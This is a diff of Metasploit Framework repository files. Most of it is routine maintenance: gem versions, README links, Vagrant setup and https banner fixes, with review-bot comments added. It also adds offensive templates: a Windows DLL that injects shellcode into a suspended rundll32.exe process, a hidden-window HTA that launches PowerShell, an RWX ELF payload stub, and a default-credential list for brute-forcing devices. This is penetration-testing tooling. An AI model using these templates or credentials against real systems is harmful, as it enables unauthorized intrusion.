metasploit-framework, 4.14.23, "New BSD" metasploit-framework, 4.15.0, "New BSD"
metasploit-model, 2.0.4, "New BSD" metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD" metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD" metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD" metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT method_source, 0.8.2, MIT
mime-types, 3.1, MIT mini_portile2, 2.2.0, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
minitest, 5.10.2, MIT minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0" msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD nexpose, 6.1.0, BSD
nokogiri, 1.7.2, MIT nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT openvas-omp, 0.0.4, MIT
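Review bot: this file is out of sync with the Gemfile.lock in the same commit even though its header says it is generated by tools/dev/update_gem_licenses.sh: actionpack and the other Rails gems are listed at 4.2.9 but locked at 4.2.10, metasploit-framework at 4.15.0 vs 4.16.11, metasploit-payloads at 1.2.37 vs 1.3.9, and metasploit-aggregator, grpc, googleauth, jwt, logging, memoist and signet are still listed although they leave the lockfile, while rbnacl and rbnacl-libsodium are absent. Re-run the generator against the final lockfile rather than hand-editing the list.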
@ -73,6 +64,7 @@ os, 0.9.6, MIT
packetfu, 1.1.13, BSD packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD" patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1 pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pg, 0.20.0, "New BSD" pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT postgres_ext, 3.0.0, MIT
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT railties, 4.2.9, MIT
rake, 12.0.0, MIT rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD rb-readline, 0.5.4, BSD
recog, 2.1.8, unknown recog, 2.1.11, unknown
redcarpet, 3.4.0, MIT redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD" rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.3, "New BSD" rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.10, "New BSD" rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD" rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD" rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD" rex-java, 0.1.5, "New BSD"
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD" rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD" rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD" rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD" rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD" rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD" rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD" rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD" rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT rspec-rails, 3.6.0, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD" ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD" rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0" signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT simplecov-html, 0.10.1, MIT
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT sshkey, 1.9.0, MIT
thor, 0.19.4, MIT thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0" thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.2, BSD windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT yard, 0.9.9, MIT

@ -14,13 +14,12 @@ New bugs and feature requests should be directed to:
API documentation for writing modules can be found at: API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing Installing
-- --
Generally, you should use [the free installer](https://www.metasploit.com/download), Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
which contains all of the dependencies and will get you up and running with a which contains all of the dependencies and will get you up and running with a
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
you'd like to deal with dependencies on your own. you'd like to deal with dependencies on your own.
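Review bot: the rewritten 'Questions and suggestions' line drops the only link the old text had and now names 'Freenode IRC channel' and 'the metasploit-hackers mailing list' without URLs; since CONTRIBUTING.md in this commit carries both (the Freenode webchat link and the Google Groups list), reuse those here. The line is also far longer than the surrounding wrapped text; break it the way the rest of the README is wrapped.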

@ -11,6 +11,7 @@ Metasploit::Framework::Require.optionally_active_record_railtie
begin begin
require 'rspec/core' require 'rspec/core'
require 'rspec-rerun/tasks'
rescue LoadError rescue LoadError
puts "rspec not in bundle, so can't set up spec tasks. " \ puts "rspec not in bundle, so can't set up spec tasks. " \
"To run specs ensure to install the development and test groups." "To run specs ensure to install the development and test groups."

Vagrantfile vendored

@ -3,10 +3,7 @@
Vagrant.configure(2) do |config| Vagrant.configure(2) do |config|
config.ssh.forward_x11 = true config.ssh.forward_x11 = true
config.vm.box = "ubuntu/trusty64" config.vm.box = "ubuntu/xenial64"
# TODO: find a minimal image that keeps up-to-date and
# supports multiple providers
#config.vm.box = "phusion/ubuntu-14.04-amd64"
config.vm.network :forwarded_port, guest: 4444, host: 4444 config.vm.network :forwarded_port, guest: 4444, host: 4444
config.vm.provider "vmware" do |v| config.vm.provider "vmware" do |v|
v.memory = 2048 v.memory = 2048
@ -26,14 +23,14 @@ Vagrant.configure(2) do |config|
[ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
"apt-get update", "apt-get update",
"apt-get dist-upgrade -y", "apt-get dist-upgrade -y",
"apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib", "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
].each do |step| ].each do |step|
config.vm.provision "shell", inline: step config.vm.provision "shell", inline: step
end end
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3", [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
"curl -L https://get.rvm.io | bash -s stable", "curl -L https://get.rvm.io | bash -s stable",
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version", "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
"source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler", "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle", "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
"mkdir -p ~/.msf4", "mkdir -p ~/.msf4",

@ -0,0 +1,16 @@
#!/bin/sh
rm -f *.o *.dll
CCx86="i686-w64-mingw32"
CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
rm -f temp.dll *.o
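Review bot: missing `set -e`: if `${CCx64}-gcc` fails, the script carries on into `dllwrap` and `strip` with no object file and the trailing `rm -f` hides the failure; add `set -eu` after the shebang so a broken compile stops the build. Consider also replacing the deprecated `dllwrap` with `${CCx64}-gcc -m64 -shared -o temp.dll *.o template.def`, and add a comment that both the x64 and x86 builds share the same `template.def`.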

@ -0,0 +1,95 @@
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
// - removed ExitThread(0) to prevent an Explorer crash
// - added Mutex to prevent invoking payload multiple times (at least try)
#include <windows.h>
#include "template.h"
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
void ExecutePayload(void)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
LPVOID ep;
HANDLE hMutex;
SECURITY_ATTRIBUTES MutexAttributes;
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
MutexAttributes.nLength = sizeof(MutexAttributes);
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
if(hMutex == NULL)
{
return;
}
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hMutex);
return;
}
if(GetLastError() == ERROR_ACCESS_DENIED)
{
CloseHandle(hMutex);
return;
}
// Start up the payload in a new process
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
CloseHandle(hMutex);
}
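Review bot: the `ERROR_ACCESS_DENIED` branch is dead code: `CreateMutex` returns NULL when access is denied, so that case has already returned through the `hMutex == NULL` check, and `GetLastError()` is only meaningful directly after the call anyway; drop the second branch or fold both into the NULL check. The comment `Create a suspended process, write shellcode into stack, make stack RWX` no longer matches the code below it, which allocates a fresh region with `VirtualAllocEx` rather than touching the stack; update the comment. Minor: the first parameter of `DllMain` should be `HINSTANCE`, not `HANDLE`, to match the documented prototype.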

@ -0,0 +1,3 @@
EXPORTS
DllMain@12
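Review bot: `DllMain@12` is the 32-bit stdcall-decorated symbol name; on x86_64 the symbol is the undecorated `DllMain`, yet `build.sh` hands this same `template.def` to the x64 `dllwrap`. Confirm that the 64-bit link actually resolves this export, and either keep a separate .def per architecture or drop the export altogether, since the DLL entry point does not require `DllMain` to appear in the export table.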

@ -0,0 +1,3 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";

@ -0,0 +1,18 @@
LANGUAGE 9, 1
VS_VERSION_INFO VERSIONINFO
FILEVERSION 0,0,0,1
PRODUCTVERSION 0,0,0,1
FILEFLAGSMASK 0x17L
FILEFLAGS 0x0L
FILEOS 0x4L
FILETYPE 0x2L
FILESUBTYPE 0x0L
BEGIN
END
#define RT_HTML 23

Binary file not shown.

Binary file not shown.

@ -88,7 +88,7 @@ class SnifferSMB < BaseProtocolParser
return "NTLMv1" return "NTLMv1"
end end
else else
raise RuntimeError, "Unknow hash type" raise RuntimeError, "Unknown hash type"
end end
end end

@ -15,5 +15,5 @@
| %bld[ OK ]%clr | | %bld[ OK ]%clr |
|______________________________________________________________________________| |______________________________________________________________________________|
| | | |
| http://metasploit.com | | https://metasploit.com |
|______________________________________________________________________________|%clr |______________________________________________________________________________|%clr

@ -18,4 +18,4 @@
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr %bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr %bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.com %clr%bld https://metasploit.com

@ -27,4 +27,4 @@
################################################################################ ################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################ ################################################################################
http://metasploit.com%clr https://metasploit.com%clr

@ -27,4 +27,4 @@
# # ### # # ## # # ### # # ##
######################## ########################
## ## ## ## ## ## ## ##
http://metasploit.com%clr https://metasploit.com%clr

@ -1,7 +1,7 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%% %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

@ -23,4 +23,4 @@
; ,''-,;' ``- ; ,''-,;' ``-
``-..__``--` ``-..__``--`
http://metasploit.com%clr https://metasploit.com%clr

@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit msf <%= mod.type %>(<%= mod.shortname %>) > exploit
``` ```
Other examples of setting the RHSOTS option: Other examples of setting the RHOSTS option:
Example 1: Example 1:

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

@ -1,5 +1,5 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

Binary file not shown.

Binary file not shown.

@ -1,8 +1,12 @@
<script language="VBScript"> <script language="VBScript">
window.moveTo -4000, -4000
Set %{var_shell} = CreateObject("Wscript.Shell") Set %{var_shell} = CreateObject("Wscript.Shell")
Set %{var_fso} = CreateObject("Scripting.FileSystemObject") Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")
%{var_shell}.Run "%{powershell}",0 If %{var_fso}.FileExists(path + "\..\powershell.exe") Then
End If %{var_shell}.Run "%{powershell}",0
Exit For
End If
Next
window.close() window.close()
</script> </script>

@ -0,0 +1,41 @@
; build with:
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
BITS 64
org 0
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0xB7 ; e_machine = AARCH64
dd 0 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
global _start
_start:
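Review bot: the comments `; Elf32_Ehdr` and `; Elf32_Phdr` are wrong for this file: the e_ident class byte is 2 (ELFCLASS64) and every address-sized field is emitted with `dq`, so the layouts are `Elf64_Ehdr` and `Elf64_Phdr`; fix the labels so nobody checks the offsets against the 32-bit structures. Also document what the `0xDEADBEEF` values in `p_filesz`/`p_memsz` stand for (they read as placeholders to be replaced later), and note that `BITS 64` is an x86 directive that only affects instruction encoding, which is harmless in an instruction-free template but misleading in a file named for AArch64.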

Binary file not shown.

@ -188,7 +188,7 @@
</div> </div>
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>
</html> </html>

@ -195,7 +195,7 @@
</div> </div>
<div class="footer"> <div class="footer">
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> <center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
</div> </div>
</body> </body>

@ -1,70 +1,100 @@
root ADMINISTRATOR ADMINISTRATOR
ADMN admn
Admin admin
Administrator
Administrator 3ware
Administrator admin
Administrator changeme
Administrator ganteng
Administrator letmein
Administrator password
Administrator pilou
Administrator smcadmin
Any 12345
CSG SESAME
Cisco Cisco
D-Link D-Link
DTA TJM
GEN1 gen1
GEN2 gen2
GlobalAdmin GlobalAdmin
HTTP HTTP
IntraStack Asante
IntraSwitch Asante
JDE JDE
LUCENT01 UI-PSWD-01
LUCENT02 UI-PSWD-02
MDaemon MServer
MICRO RSX
Manager Manager
Manager friend
NAU NAU
NETWORK NETWORK
NICONEX NICONEX
PBX PBX
PFCUser 240653C9467E45
PRODDTA PRODDTA
PSEAdmin $secure$
PlcmSpIp PlcmSpIp
Polycom SpIp
RMUser1 password
SYSADM sysadm
Sweex Mysweex
USERID PASSW0RD
User Password
VNC winterm
VTech VTech
ZXDSL ZXDSL
acc acc
adfexc adfexc
adm
admin admin
guest
root root
root password
root 1234
root 12345
root 123456
root 3ep5w2u
root admin
root Admin
root admin_1
root alpine
root ascend
root attack
root blender
root calvin
root changeme
root Cisco
root cms500
root davox
root default
root fivranne
root ggdaseuaimhrke
root iDirect
root letacla
root Mau'dib
root pass
root permit
root ROOT500
root tini
root tslinux
root wyse
ro ro
router router
rwa rwa
rw rw
ubnt ubnt
guest guest
guest User
admin 0 admin 0
admin 0000 admin 0000
admin 1111 admin 1111
admin 11111111
admin 123 admin 123
admin 1234 admin 1234
admin 123456 admin 123456
admin 1234567890
admin 1234admin admin 1234admin
admin 2222 admin 2222
admin 22222 admin 22222
admin2 changeme
admin 3477 admin 3477
admin 3ascotel admin 3ascotel
admin 7ujMko0admin
admin 7ujMko0vizxv
admin 9999 admin 9999
admin Admin
admin AitbISP4eCiG
admin Ascend
admin BRIDGE
admin Intel
admin MiniAP
admin NetCache
admin NetICs
admin OCS
admin P@55w0rd!
admin PASSWORD
admin Protector
admin SMDR
admin SUPER
admin Symbol
admin TANDBERG
admin _Cisco
admin access admin access
admin admin admin admin
admin Admin admin admin117.35.97.74
Admin admin
admin admin123 admin admin123
admin admin1234
admin administrator
admin adminttd admin adminttd
admin adslolitec admin adslolitec
admin adslroot admin adslroot
admin adtran admin adtran
admin AitbISP4eCiG
admin articon admin articon
admin asante admin asante
admin ascend admin ascend
admin Ascend
admin asd admin asd
admin atc123 admin atc123
admin atlantis admin atlantis
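Review bot: the new-side entry `admin admin117.35.97.74` looks like an IP address pasted onto the `admin admin` pair; the correct `admin admin` line already sits directly above it, so drop the corrupted entry. Many other lines in this hunk are moves rather than changes (`Administrator admin`, `Cisco Cisco`, `D-Link D-Link`, and so on), which makes the real additions hard to spot; keeping the list sorted and deduplicated in one consistent order would make future changes reviewable.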
@ -72,11 +102,9 @@ admin backdoor
admin barricade admin barricade
admin barricadei admin barricadei
admin bintec admin bintec
admin BRIDGE
admin cableroot admin cableroot
admin changeme admin changeme
admin cisco admin cisco
admin _Cisco
admin comcomcom admin comcomcom
admin conexant admin conexant
admin default admin default
@ -84,96 +112,79 @@ admin diamond
admin enter admin enter
admin epicrouter admin epicrouter
admin extendnet admin extendnet
admin fliradmin
admin giraff admin giraff
admin hagpolm1 admin hagpolm1
admin hello admin hello
admin help admin help
admin hp.com admin hp.com
admin Intel
admin ironport admin ironport
admin isee admin isee
acc acc admin jvc
adfexc adfexc
adm
admin kont2004 admin kont2004
admin letmein admin letmein
admin leviton admin leviton
admin linga admin linga
admin meinsma
admin michaelangelo
admin michelangelo admin michelangelo
admin microbusiness admin microbusiness
admin MiniAP
admin motorola admin motorola
admin mu admin mu
admin my_DEMARC admin my_DEMARC
admin netadmin admin netadmin
admin NetCache
admin NetICs
admin noway admin noway
admin OCS admin oelinux123
admin operator admin operator
admin P@55w0rd!
admin password
admin p-assword admin p-assword
admin PASSWORD admin pass
admin password
admin passwort admin passwort
admin pento admin pento
admin pfsense admin pfsense
admin private admin private
admin Protector
admin public admin public
admin pwp admin pwp
admin radius admin radius
admin rmnetlm admin rmnetlm
admin root admin root
admin secure admin secure
admin service
admin setup admin setup
admin sitecom admin sitecom
admin smallbusiness admin smallbusiness
admin smcadmin admin smcadmin
admin SMDR
admin speedxess admin speedxess
admin SUPER
admin superuser admin superuser
admin support
admin switch admin switch
admin Symbol
admin synnet admin synnet
admin sysAdmin admin sysAdmin
admin system admin system
admin TANDBERG admin tech
admin ubnt
admin visual admin visual
admin w2402 admin w2402
admin xad$|#12 admin wbox
admin xad$l#12 admin xad$l#12
admin xad$|#12
admin zoomadsl admin zoomadsl
system change_on_install admin2 changeme
system/manager sys/change_on_install administrator administrator
system password administrator changeme
system sys adminstat OCS
adminstrator changeme
adminttd adminttd adminttd adminttd
adminuser OCS adminuser OCS
adminview OCS adminview OCS
adminstat OCS alpine alpine
adminstrator changeme
Administrator 3ware
Administrator admin
administrator administrator
ADMINISTRATOR ADMINISTRATOR
administrator changeme
Administrator changeme
Administrator ganteng
Administrator letmein
Administrator password
Administrator pilou
Administrator smcadmin
ADMN admn
ami ami
anonymous any@
anonymous Exabyte anonymous Exabyte
Any 12345 anonymous any@
apc apc apc apc
at4400 at4400 at4400 at4400
bbsd-client changeme2
bbsd-client NULL bbsd-client NULL
bbsd-client changeme2
bciim bciimpw bciim bciimpw
bcim bcimpw bcim bcimpw
bcms bcmspw bcms bcmspw
@ -191,7 +202,6 @@ cellit cellit
cgadmin cgadmin cgadmin cgadmin
cisco cisco
cisco cisco cisco cisco
Cisco Cisco
citel citel citel citel
client client client client
cmaker cmaker cmaker cmaker
@ -201,15 +211,19 @@ craft
craft craft craft craft
craft craftpw craft craftpw
craft crftpw craft crftpw
CSG SESAME
cusadmin highspeed cusadmin highspeed
cust custpw cust custpw
customer customer
customer none customer none
dadmin dadmin01 dadmin dadmin01
daemon
davox davox davox davox
debug d.e.b.u.g debug d.e.b.u.g
debug synnet debug synnet
default
default antslq
default default
default password
deskalt password deskalt password
deskman changeme deskman changeme
desknorm password desknorm password
@ -220,41 +234,39 @@ dhs3pms dhs3pms
diag danger diag danger
diag switch diag switch
disttech 4tas disttech 4tas
D-Link D-Link
draytek 1234 draytek 1234
DTA TJM
e250 e250changeme e250 e250changeme
e500 e500changeme e500 e500changeme
echo echo
echo User echo User
echo echo
enable enable
eng engineer eng engineer
enquiry enquirypw enquiry enquirypw
field support field support
GEN1 gen1 guest
GEN2 gen2 guest 1111
GlobalAdmin GlobalAdmin guest 12345
guest 123456
guest User
guest guest
guest xc3511
halt tlah halt tlah
helpdesk OCS helpdesk OCS
hsa hsadb hsa hsadb
hscroot abc123 hscroot abc123
HTTP HTTP
hydrasna hydrasna
iclock timely iclock timely
images images images images
inads inads inads inads
inads indspw inads indspw
init initpw init initpw
installer installer
install llatsni install llatsni
install secret install secret
installer installer
intel intel intel intel
intermec intermec intermec intermec
intermec intermec1QTPS intermec intermec1QTPS
